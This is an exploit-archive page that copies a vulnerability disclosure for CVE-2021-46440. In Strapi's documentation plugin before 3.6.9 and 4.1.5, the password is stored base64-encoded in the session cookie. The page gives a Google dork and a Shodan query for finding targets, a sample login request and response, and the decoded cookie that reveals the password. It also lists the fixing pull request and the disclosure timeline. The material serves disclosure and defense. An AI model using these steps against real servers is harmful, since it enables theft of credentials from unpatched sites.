Advertisement






Strapi 3.6.8 Password Disclosure / Insecure Handling

CVE Category Price Severity
CVE-2021-46440 CWE-200 Variable High
Author Risk Exploitation Type Date
Unknown High Remote 2022-05-03
CPE
cpe:cpe:/a:strapi:content_management_framework:3.6.8
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050011

Below is a copy:

Strapi 3.6.8 Password Disclosure / Insecure Handling
# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format
# Google Dork: intitle:"Welcome to your Strapi ap"
# Shodan search: "X-Powered-By: Strapi <strapi.io>"
# Date: 2022-03-30
# Exploit Author: Kitchaphan Singchai [idealphase]
# Vendor Homepage: https://strapi.io/
# Software Link: https://github.com/strapi/strapi/releases
# Vulnerable Version: < 3.6.9 and < 4.1.5
# Version: 3.6.8
# Tested on: Linux
# CVE: CVE-2021-46440

# Description:
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.

# This CVE has been fixed via this Github pull request.
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)

# PoC:
[Request]
POST /documentation/login HTTP/1.1
Host: 127.0.0.1:1337
..[SNIP]..

password=password

[Response]
HTTP/1.1 302 Found
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly
X-Powered-By: Strapi <strapi.io>
..[SNIP]..

Redirecting to <a href="/documentation">/documentation</a>.

Perform Base64 decoding and we got plaintext password in documentation json key as shown below.
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}

# Timeline:
19/Jan/2022 - Inform vulnerability to Strapi team
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
28/Mar/2022 - Reserved CVE-2021-46440
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum